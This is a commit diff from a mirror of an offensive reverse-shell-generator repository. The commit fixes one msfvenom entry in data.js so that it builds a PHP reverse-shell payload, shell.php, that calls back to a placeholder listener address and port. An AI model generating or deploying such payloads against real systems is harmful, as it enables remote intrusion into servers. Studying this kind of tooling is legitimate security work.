mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-19 11:26:10 +00:00
Update data.js
Fixed reverse_php in MSFVenom Generator
This commit is contained in:
parent
5b0dac992f
commit
0bb4509882
@ -312,7 +312,7 @@ const msfvenomCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "PHP Reverse PHP",
|
||||
"command": "msfvenom -p php/reverse_tcp LHOST={ip} LPORT={port} -o shell.php",
|
||||
"command": "msfvenom -p php/reverse_php LHOST={ip} LPORT={port} -o shell.php",
|
||||
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user